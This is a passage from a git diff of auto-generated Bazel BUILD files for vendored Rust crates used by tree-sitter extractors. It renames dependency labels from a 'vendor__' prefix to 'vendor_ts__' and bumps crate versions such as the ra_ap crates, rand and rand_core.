"@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) exports_files(["rust.ungram"]) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.266.bazel similarity index 80% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.266.bazel index 62290545bbc8..501bd5f18418 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-bridge-0.0.266.bazel @@ -17,12 +17,12 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], 
@@ -87,15 +87,15 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.266.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.266.bazel index 86dfdc8d6c3b..66f181536d6a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_toolchain-0.0.266.bazel @@ -79,9 +79,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__camino-1.1.9//:camino", - "@vendor__home-0.5.11//:home", + "@vendor_ts__camino-1.1.9//:camino", + "@vendor_ts__home-0.5.11//:home", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.266.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.266.bazel index b3de52733253..19c7faf10dd2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_tt-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", }, compile_data = glob( include = ["**"], @@ -83,12 +83,12 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.266.bazel similarity index 86% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.266.bazel index e370e63c4a08..af56a94962c1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", }, compile_data = glob( include = ["**"], @@ -83,15 +83,15 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__fst-0.4.7//:fst", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__nohash-hasher-0.2.0//:nohash_hasher", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__fst-0.4.7//:fst", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__nohash-hasher-0.2.0//:nohash_hasher", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.266.bazel similarity index 84% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.266.bazel index 43deef421ae0..97a009bdce5b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_vfs-notify-0.0.266.bazel @@ -17,9 +17,9 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", }, compile_data = glob( include = ["**"], 
@@ -84,16 +84,16 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__notify-6.1.1//:notify", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__rayon-1.10.0//:rayon", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__walkdir-2.5.0//:walkdir", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__notify-8.0.0//:notify", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__rayon-1.10.0//:rayon", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__walkdir-2.5.0//:walkdir", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel deleted file mode 100644 index de831037046f..000000000000 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel +++ /dev/null 
@@ -1,170 +0,0 @@ -############################################################################### -# @generated -# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To -# regenerate this file, run the following: -# -# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors -############################################################################### - -load("@rules_rust//rust:defs.bzl", "rust_library") - -package(default_visibility = ["//visibility:public"]) - -rust_library( - name = "rand", - srcs = glob( - include = ["**/*.rs"], - allow_empty = True, - ), - compile_data = glob( - include = ["**"], - allow_empty = True, - exclude = [ - "**/* *", - ".tmp_git_root/**/*", - "BUILD", - "BUILD.bazel", - "WORKSPACE", - "WORKSPACE.bazel", - ], - ), - crate_features = [ - "alloc", - "default", - "getrandom", - "libc", - "rand_chacha", - "std", - "std_rng", - ], - crate_root = "src/lib.rs", - edition = "2018", - rustc_flags = [ - "--cap-lints=allow", - ], - tags = [ - "cargo-bazel", - "crate-name=rand", - "manual", - "noclippy", - "norustfmt", - ], - target_compatible_with = select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [], - "@rules_rust//rust/platform:aarch64-apple-ios": [], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], - "@rules_rust//rust/platform:aarch64-linux-android": [], - "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], - "@rules_rust//rust/platform:aarch64-unknown-uefi": [], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:armv7-linux-androideabi": [], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], - "@rules_rust//rust/platform:i686-apple-darwin": [], - 
"@rules_rust//rust/platform:i686-linux-android": [], - "@rules_rust//rust/platform:i686-pc-windows-msvc": [], - "@rules_rust//rust/platform:i686-unknown-freebsd": [], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], - "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], - "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], - "@rules_rust//rust/platform:thumbv7em-none-eabi": [], - "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], - "@rules_rust//rust/platform:wasm32-unknown-unknown": [], - "@rules_rust//rust/platform:wasm32-wasip1": [], - "@rules_rust//rust/platform:x86_64-apple-darwin": [], - "@rules_rust//rust/platform:x86_64-apple-ios": [], - "@rules_rust//rust/platform:x86_64-linux-android": [], - "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], - "@rules_rust//rust/platform:x86_64-unknown-none": [], - "@rules_rust//rust/platform:x86_64-unknown-uefi": [], - "//conditions:default": ["@platforms//:incompatible"], - }), - version = "0.8.5", - deps = [ - "@vendor__rand_chacha-0.3.1//:rand_chacha", - "@vendor__rand_core-0.6.4//:rand_core", - ] + select({ - "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # aarch64-apple-darwin - ], - "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # aarch64-apple-ios - ], - "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__libc-0.2.169//:libc", # aarch64-apple-ios-sim - ], - "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # aarch64-linux-android - ], - "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ 
- "@vendor__libc-0.2.169//:libc", # aarch64-unknown-fuchsia - ], - "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-linux-gnu - ], - "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-linux-gnu, aarch64-unknown-nixos-gnu - ], - "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__libc-0.2.169//:libc", # aarch64-unknown-nto-qnx710 - ], - "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # arm-unknown-linux-gnueabi - ], - "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__libc-0.2.169//:libc", # armv7-linux-androideabi - ], - "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__libc-0.2.169//:libc", # armv7-unknown-linux-gnueabi - ], - "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # i686-apple-darwin - ], - "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__libc-0.2.169//:libc", # i686-linux-android - ], - "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", # i686-unknown-freebsd - ], - "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # i686-unknown-linux-gnu - ], - "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # powerpc-unknown-linux-gnu - ], - "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # s390x-unknown-linux-gnu - ], - "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__libc-0.2.169//:libc", # x86_64-apple-darwin - ], - "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__libc-0.2.169//:libc", # x86_64-apple-ios - ], - "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__libc-0.2.169//:libc", # x86_64-linux-android - ], - "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__libc-0.2.169//:libc", 
# x86_64-unknown-freebsd - ], - "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__libc-0.2.169//:libc", # x86_64-unknown-fuchsia - ], - "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__libc-0.2.169//:libc", # x86_64-unknown-linux-gnu - ], - "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__libc-0.2.169//:libc", # x86_64-unknown-linux-gnu, x86_64-unknown-nixos-gnu - ], - "//conditions:default": [], - }), -) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel new file mode 100644 index 000000000000..9dc571cda9a3 --- /dev/null +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel 
@@ -0,0 +1,97 @@ +############################################################################### +# @generated +# DO NOT MODIFY: This file is auto-generated by a crate_universe tool. To +# regenerate this file, run the following: +# +# bazel run @@//misc/bazel/3rdparty:vendor_tree_sitter_extractors +############################################################################### + +load("@rules_rust//rust:defs.bzl", "rust_library") + +package(default_visibility = ["//visibility:public"]) + +rust_library( + name = "rand", + srcs = glob( + include = ["**/*.rs"], + allow_empty = True, + ), + compile_data = glob( + include = ["**"], + allow_empty = True, + exclude = [ + "**/* *", + ".tmp_git_root/**/*", + "BUILD", + "BUILD.bazel", + "WORKSPACE", + "WORKSPACE.bazel", + ], + ), + crate_features = [ + "alloc", + "default", + "os_rng", + "small_rng", + "std", + "std_rng", + "thread_rng", + ], + crate_root = "src/lib.rs", + edition = "2021", + rustc_flags = [ + "--cap-lints=allow", + ], + tags = [ + "cargo-bazel", + "crate-name=rand", + "manual", + "noclippy", + "norustfmt", + ], + target_compatible_with = select({ + "@rules_rust//rust/platform:aarch64-apple-darwin": [], + "@rules_rust//rust/platform:aarch64-apple-ios": [], + "@rules_rust//rust/platform:aarch64-apple-ios-sim": [], + "@rules_rust//rust/platform:aarch64-linux-android": [], + "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [], + "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [], + "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [], + "@rules_rust//rust/platform:aarch64-unknown-uefi": [], + "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:armv7-linux-androideabi": [], + "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [], + "@rules_rust//rust/platform:i686-apple-darwin": [], + 
"@rules_rust//rust/platform:i686-linux-android": [], + "@rules_rust//rust/platform:i686-pc-windows-msvc": [], + "@rules_rust//rust/platform:i686-unknown-freebsd": [], + "@rules_rust//rust/platform:i686-unknown-linux-gnu": [], + "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [], + "@rules_rust//rust/platform:riscv32imc-unknown-none-elf": [], + "@rules_rust//rust/platform:riscv64gc-unknown-none-elf": [], + "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [], + "@rules_rust//rust/platform:thumbv7em-none-eabi": [], + "@rules_rust//rust/platform:thumbv8m.main-none-eabi": [], + "@rules_rust//rust/platform:wasm32-unknown-unknown": [], + "@rules_rust//rust/platform:wasm32-wasip1": [], + "@rules_rust//rust/platform:x86_64-apple-darwin": [], + "@rules_rust//rust/platform:x86_64-apple-ios": [], + "@rules_rust//rust/platform:x86_64-linux-android": [], + "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [], + "@rules_rust//rust/platform:x86_64-unknown-freebsd": [], + "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [], + "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [], + "@rules_rust//rust/platform:x86_64-unknown-none": [], + "@rules_rust//rust/platform:x86_64-unknown-uefi": [], + "//conditions:default": ["@platforms//:incompatible"], + }), + version = "0.9.0", + deps = [ + "@vendor_ts__rand_chacha-0.9.0//:rand_chacha", + "@vendor_ts__rand_core-0.9.2//:rand_core", + "@vendor_ts__zerocopy-0.8.20//:zerocopy", + ], +) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.3.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.9.0.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.3.1.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.9.0.bazel index 80c48fd82252..eb188225fa44 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.3.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_chacha-0.9.0.bazel @@ -32,7 +32,7 @@ rust_library( "std", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -82,9 +82,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.3.1", + version = "0.9.0", deps = [ - "@vendor__ppv-lite86-0.2.20//:ppv_lite86", - "@vendor__rand_core-0.6.4//:rand_core", + "@vendor_ts__ppv-lite86-0.2.20//:ppv_lite86", + "@vendor_ts__rand_core-0.9.2//:rand_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.6.4.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.9.2.bazel similarity index 95% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.6.4.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.9.2.bazel index f3d96b8a33c7..79af89a699ed 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.6.4.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand_core-0.9.2.bazel @@ -29,12 +29,11 @@ rust_library( ], ), crate_features = [ - "alloc", - "getrandom", + "os_rng", "std", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -84,8 +83,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.6.4", + version = "0.9.2", deps = [ - "@vendor__getrandom-0.2.15//:getrandom", + "@vendor_ts__getrandom-0.3.1//:getrandom", + "@vendor_ts__zerocopy-0.8.20//:zerocopy", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel index abe95003d292..f84dc0969f2c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-1.10.0.bazel @@ -81,7 +81,7 @@ rust_library( }), version = "1.10.0", deps = [ - "@vendor__either-1.13.0//:either", - "@vendor__rayon-core-1.12.1//:rayon_core", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__rayon-core-1.12.1//:rayon_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel index 2abb8caa8698..53bd8e6fe3d6 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rayon-core-1.12.1.bazel @@ -82,9 +82,9 @@ rust_library( }), version = "1.12.1", deps = [ - "@vendor__crossbeam-deque-0.8.6//:crossbeam_deque", - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", - "@vendor__rayon-core-1.12.1//:build_script_build", + "@vendor_ts__crossbeam-deque-0.8.6//:crossbeam_deque", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__rayon-core-1.12.1//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel index f9f0c89fa5ec..adc812c3df5a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.redox_syscall-0.5.8.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.5.8", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", + "@vendor_ts__bitflags-2.8.0//:bitflags", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel index e0a2b9880c24..0399f3132c64 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-1.11.1.bazel @@ -100,9 +100,9 @@ rust_library( }), version = "1.11.1", deps = [ - "@vendor__aho-corasick-1.1.3//:aho_corasick", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__regex-automata-0.4.9//:regex_automata", - "@vendor__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__aho-corasick-1.1.3//:aho_corasick", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__regex-automata-0.4.9//:regex_automata", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel index 1978a52d5c2d..59e85402070a 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.1.10.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "0.1.10", deps = [ - "@vendor__regex-syntax-0.6.29//:regex_syntax", + "@vendor_ts__regex-syntax-0.6.29//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel index f16dfc66ef22..02062f8053c7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.regex-automata-0.4.9.bazel 
@@ -107,8 +107,8 @@ rust_library( }), version = "0.4.9", deps = [ - "@vendor__aho-corasick-1.1.3//:aho_corasick", - "@vendor__memchr-2.7.4//:memchr", - "@vendor__regex-syntax-0.8.5//:regex_syntax", + "@vendor_ts__aho-corasick-1.1.3//:aho_corasick", + "@vendor_ts__memchr-2.7.4//:memchr", + "@vendor_ts__regex-syntax-0.8.5//:regex_syntax", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel index b35e36f48ccf..f2f46f442a8c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rowan-0.15.15.bazel @@ -81,10 +81,10 @@ rust_library( }), version = "0.15.15", deps = [ - "@vendor__countme-3.0.1//:countme", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__memoffset-0.9.1//:memoffset", - "@vendor__rustc-hash-1.1.0//:rustc_hash", - "@vendor__text-size-1.1.1//:text_size", + 